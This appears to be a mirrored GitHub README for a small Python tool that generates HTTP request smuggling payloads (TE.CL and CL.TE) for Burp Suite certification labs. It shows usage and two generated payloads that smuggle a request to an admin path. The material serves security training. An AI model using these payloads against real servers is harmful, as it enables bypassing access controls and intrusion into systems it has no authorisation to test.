Giters

dhmosfunk / simple-http-smuggler-generator

This tool is developed for burp suite practitioner certificate exam and HTTP Request Smuggling labs. The most important about this tool is TE.CL vulnerability exploitation and chunk size auto generator. Feel free to contribute and make a PR ;) Have fun exploiting these labs >.<

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Introduction

This tool is developed for burp suite practitioner certificate exam and HTTP Request Smuggling labs. The most important about this tool is TE.CL vulnerability exploitation and chunk size auto generator so you don't have to calculate the chunk size for the second(malicious request). Τhis tool is simple but very useful

The inspiration about this tool it was the HTTP Requests Smuggler extension tool from burpsuite to use it you must have a valid burpsuite license.

For the valid chunk generator (TE.CL) i found the source code from HTTP Requests Smuggler extension. You can find the source code below.

TE-CL | PortSwigger HTTP Request Smuggler Resource
CL-TE | PortSwigger HTTP Request Smuggler Resource

⚠️ Attention this tool does not offer automated exploitation. You have to identify the injection point and exploit it manually!

Installation

$ git clone https://github.com/dhmosfunk/simple-http-smuggler-generator.git
$ python3 tool.py --help

Usage

Sometimes needs to use and append more HTTP Headers in the malicious request for different purposes E.g. bypass localhost restrictions. So you can add your own HTTP headers at /lib/clte.py or /lib/tecl.py.

$ python3 tool.py --help
usage: tool.py -v clte/tecl -host xxxxxxxxxx.net  -a admin_panel -m GET

options:
  -h, --help            show this help message and exit
  -v VULNERABILITY, --vulnerability VULNERABILITY
                        Possible values CLTE or TECL
  -host HOSTNAME, --hostname HOSTNAME
                        Target HOSTNAME
  -a ACTION, --action ACTION
                        ex. admin_panel
  -m METHOD, --method METHOD
                        Request Methods [GET, POST]

Generating TE.CL Request

$ python3 tool.py -v tecl -host xxxx.net -a admin_panel -m get

---[TE.CL Payload Generated]---

Transfer-Encoding: chunked
Content-Length: 3

75
GET /admin_panel HTTP/1.1
Host: xxxx.net
Content-Type: application/x-www-form-urlencoded
Content-length: 15

x=1
0

---[TE.CL Payload Generated]---

[INFO]> Dont forget the \r\n after 0
Also disable the auto-update Content-Length from menu

Send TE.CL Request

image

Generating CL.TE Request

$ python3 tool.py -v clte -host xxxx.net -a admin_panel -m get

---[CL.TE Payload Generated]---

Transfer-Encoding: chunked

0

GET /admin_panel HTTP/1.1
Host: xxxx.net
X-Ignore: X


---[CL.TE Payload Generated]---

Send CL.TE Generated Request

image

About

This tool is developed for burp suite practitioner certificate exam and HTTP Request Smuggling labs. The most important about this tool is TE.CL vulnerability exploitation and chunk size auto generator. Feel free to contribute and make a PR ;) Have fun exploiting these labs >.<

Languages

Language:Python 100.0%